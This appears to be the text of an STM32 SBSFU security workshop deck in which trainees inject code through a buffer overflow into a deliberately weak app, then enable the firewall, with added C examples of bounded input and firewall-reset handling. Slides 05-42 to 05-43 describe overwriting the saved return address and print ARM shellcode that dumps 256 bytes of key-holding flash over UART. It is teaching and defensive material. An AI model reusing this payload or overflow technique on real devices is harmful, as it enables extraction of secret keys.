05-STM32 - Security - WS - Adding Protections
05 Adding protections
Adding protections hands-on
• Purpose:
• Experience a code injection attack
• Activate the counter-measure included in SBSFU (isolation)
• Hands-on scenario
• Experiment a real code injection attack
• Activate the firewall mechanism in SBSFU as counter-measure
05-2
What is an inner attack?
• The principle is:
• Exploit a software weakness
• Inject malicious code
• Example: the buffer overflow
• Send more data than expected
• Software does not check the limit (weakness/bug)
• Data can then be written at an unexpected location
• Impacts system behaviour
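The following is an added example, not the workshop's UserApp_WithWeakness code: a receive routine that trusts the length announced by the sender, beside a bounded version, run against a constructed oversized message. The stack frame layout (Buffer[0..N-1], saved R7, saved LR) follows the later slide, but is modelled here as a flat byte array so the demonstration runs on a PC and the copy stays inside the array. ORIGINAL_LR and MARKER are constructed values, not real addresses.

```c
/* Added example (not from the workshop): unchecked vs. bounded receive into a
 * simulated stack frame. Frame = Buffer[0..BUF_LEN-1] | saved R7 | saved LR. */
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN     16u
#define FRAME_LEN   (BUF_LEN + 8u)   /* buffer, saved R7 (4), saved LR (4) */
#define LR_OFFSET   (BUF_LEN + 4u)   /* LR is the last word of the frame */
#define ORIGINAL_LR 0x08001235u      /* constructed: the caller's return address */
#define MARKER      0xDEADBEEFu      /* constructed: shows where sender bytes land */

/* Read the saved return address out of the simulated frame. */
uint32_t frame_lr(const uint8_t *frame)
{
    uint32_t lr;
    memcpy(&lr, frame + LR_OFFSET, sizeof lr);
    return lr;
}

/* Fresh frame: empty buffer, saved R7 = 0, saved LR = ORIGINAL_LR. */
static void frame_init(uint8_t *frame)
{
    uint32_t r7 = 0, lr = ORIGINAL_LR;
    memset(frame, 0, FRAME_LEN);
    memcpy(frame + BUF_LEN, &r7, sizeof r7);
    memcpy(frame + LR_OFFSET, &lr, sizeof lr);
}

/* Weak receive: copies whatever length the sender announced (the bug). */
int weak_receive(uint8_t *frame, const uint8_t *data, size_t len)
{
    memcpy(frame, data, len);        /* no comparison against BUF_LEN */
    return 0;
}

/* Hardened receive: anything longer than the buffer is rejected, frame untouched. */
int safe_receive(uint8_t *frame, const uint8_t *data, size_t len)
{
    if (len > BUF_LEN)
        return -1;
    memcpy(frame, data, len);
    return 0;
}

/* Constructed oversized message: BUF_LEN filler bytes, four bytes covering
 * saved R7, then four bytes covering saved LR. Its length equals FRAME_LEN so
 * the weak copy stays inside the simulated frame (defined behaviour). */
static size_t build_oversized(uint8_t *out)
{
    uint32_t r7 = 0, marker = MARKER;
    memset(out, 'A', BUF_LEN);
    memcpy(out + BUF_LEN, &r7, sizeof r7);
    memcpy(out + LR_OFFSET, &marker, sizeof marker);
    return FRAME_LEN;
}

/* Saved LR after the weak version processed the oversized message. */
uint32_t lr_after_weak(void)
{
    uint8_t frame[FRAME_LEN], msg[FRAME_LEN];
    size_t len = build_oversized(msg);
    frame_init(frame);
    weak_receive(frame, msg, len);
    return frame_lr(frame);
}

/* Run the hardened version; returns its return code, writes the LR it left. */
static int run_safe(uint32_t *lr)
{
    uint8_t frame[FRAME_LEN], msg[FRAME_LEN];
    size_t len = build_oversized(msg);
    frame_init(frame);
    int rc = safe_receive(frame, msg, len);
    *lr = frame_lr(frame);
    return rc;
}

int rc_after_safe(void) { uint32_t lr; return run_safe(&lr); }
uint32_t lr_after_safe(void) { uint32_t lr; run_safe(&lr); return lr; }

int main(void)
{
    printf("weak: LR 0x%08" PRIx32 " -> 0x%08" PRIx32 "\n",
           (uint32_t)ORIGINAL_LR, lr_after_weak());
    printf("safe: rc=%d, LR 0x%08" PRIx32 "\n", rc_after_safe(), lr_after_safe());
    return 0;
}
```

The weak version ends with MARKER in the saved-LR slot, which is exactly the situation the stack slide describes; the bounded version returns -1 and leaves the return address as it was. On real firmware the check belongs at the point where the announced length is first trusted (the UART receive handler), before any copy.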
05-3
Simple example
05-4
Let’s build this weak code
• Open
• Build
• Check
05-5
SBSFU security protection management
05-6
Open app_sfu.h from STM32L476RG_NUCLEO_2_Images_SBSFU
05-7
Comment the #define using Toggle Comment
05-8
Block commented
To uncomment manually: double click to get the code snippet & copy-paste it into app_sfu.h
WARNING! CTRL-S: save the file after modification!
05-10
Rebuild SBSFU
05-11
Launch postbuild script
• 03_01_Postbuild_SimpleApp_WithWeakness.bat
• To combine SBSFU, UserApp_WithWeakness and header
05-12
Update the target
• 00_ResetL4Target.bat
• 03_02_Flash_SBSFU_SimpleApp_WithWeakness.bat
05-13
Restart the board
05-14
Check application is working
05-15
Now everything is ready!
05-16
Send hack.bin to target
Go to:
C:\STM32SecuWS\L4\STM32L476_SimpleApp_WithWeakness
05-17
Attack performed!
05-19
Conclusion
05-20
How SBSFU addresses Isolation
05-21
SBSFU protection on STM32L4
[Figure: memory map of the SBSFU regions on STM32L4 with the protection applied to each. Regions shown: SBSFU code & constants, SBSFU Vdata/Stack/Heap, Active image header, Active image, Download image header, Download image, Vdata/Stack/Heap. Legend: DAP; WRP + MPU-RX; FWALL (code) + WRP + MPU-RX; FWALL (code) + WRP + PCROP + MPU-RX.]
05-22
Activate firewall
Uncomment Firewall activation, then CTRL-S to save
05-23
Rebuild SBSFU
05-24
Use scripts to prepare and flash the board
05-25
Perform the attack again
05-26
Result with FIREWALL
• SBSFU provides a framework for implementing your own specific action upon detection of a firewall reset
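An added example of such an action, not SBSFU's own code: on STM32L4 a firewall violation ends in a system reset that is flagged in RCC_CSR, so the boot code can classify the reset cause and decide a policy. The bit positions (FWRSTF = bit 24, RMVF = bit 23) are assumptions taken from the STM32L4 reference manual; check them against your device. The register is passed in as a value and the event counter is a plain variable standing in for non-volatile storage, so the logic runs on a PC.

```c
/* Added example (not SBSFU code): reset-cause policy for firewall resets.
 * Bit positions are assumed from the STM32L4 reference manual, verify them. */
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

#define RCC_CSR_RMVF   (1u << 23)   /* assumed: write 1 to clear reset flags */
#define RCC_CSR_FWRSTF (1u << 24)   /* assumed: firewall reset flag */

typedef enum {
    ACTION_NONE = 0,          /* ordinary reset: continue normal boot */
    ACTION_LOG_AND_CONTINUE,  /* firewall reset seen: record it, then boot */
    ACTION_LOCK_DOWN          /* threshold reached: stay in SBSFU, do not boot */
} fw_action_t;

/* Stands in for a counter kept in non-volatile memory on the target. */
static uint32_t fw_reset_count;

/* Clear the persisted counter (e.g. after a trusted update); returns 0. */
int fw_counter_reset(void)
{
    fw_reset_count = 0;
    return 0;
}

/* Decide the action from the RCC_CSR snapshot read at boot. The firewall
 * reset flag is only one of several reset flags; everything else is treated
 * as an ordinary reset here. */
fw_action_t handle_reset_cause(uint32_t rcc_csr, uint32_t max_events)
{
    if (!(rcc_csr & RCC_CSR_FWRSTF))
        return ACTION_NONE;

    fw_reset_count++;                 /* would be written back to NV storage */
    printf("firewall reset detected (event %" PRIu32 " of %" PRIu32 ")\n",
           fw_reset_count, max_events);

    return fw_reset_count >= max_events ? ACTION_LOCK_DOWN
                                        : ACTION_LOG_AND_CONTINUE;
}

/* Value to write back so the flags are cleared before the next reset. */
uint32_t rcc_csr_clear_flags(uint32_t rcc_csr)
{
    return rcc_csr | RCC_CSR_RMVF;
}

int main(void)
{
    /* Constructed boot sequence: one clean boot, then three firewall resets. */
    const uint32_t boots[] = { 0u, RCC_CSR_FWRSTF, RCC_CSR_FWRSTF, RCC_CSR_FWRSTF };
    fw_counter_reset();
    for (size_t i = 0; i < sizeof boots / sizeof boots[0]; i++)
        printf("boot %zu -> action %d\n", i, (int)handle_reset_cause(boots[i], 3));
    return 0;
}
```

The threshold turns a single accidental trip of the firewall into a logged event while a repeated pattern, which is what an ongoing injection attempt looks like, stops the user application from being started at all; the counter must live in memory the user application cannot erase, otherwise the attacker's next payload can simply clear it.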
05-27
That’s all for this hands-on
05-28
Thank you!
05-41
How the stack looks in such a case
End of stack (low addresses)
Available stack
05-42
How can the attack be performed?
[Figure: stack layout, from low to high addresses: Remaining stack | Buffer[0] … Buffer[N-1] | R7 | LR (return address) | Stack from caller]
• The last word (LR) is the return address.
• Attacker can replace it with the address of the beginning of his assembly code
05-43
Example of assembly code for attack
Purpose of this code: read flash content and send it on UART
hack:
start:
    CPSID I                // disable interrupts
    MOV   R2, #0x441C      // UART_ISR register address
    MOVT  R2, #0x4000
    MOV   R3, #0x03F0      // Flash address containing keys
    MOVT  R3, #0x0800
    MOV   R4, #256         // Number of bytes to read
send_byte:
    LDRB  R1, [R3], #1     // Read one byte in flash
    STRB  R1, [R2, #12]    // Send byte to UART_TDR register
wait_complete:
    LDR   R6, [R2, #0]     // Read UART ISR
    ANDS  R6, R6, #64      // Check End of Transmit flag
    CMP   R6, #0           // R6 is 0 if character not transmitted yet
    BEQ.N wait_complete
    SUB   R4, R4, #1
    CMP   R4, #0
    BNE   send_byte        // R4 not yet 0, we can send next byte
    NOP                    // NOPs to be added to fit the exact buffer size
    NOP
    NOP
.end
05-44
From hack code to data injected
Content of hack.bin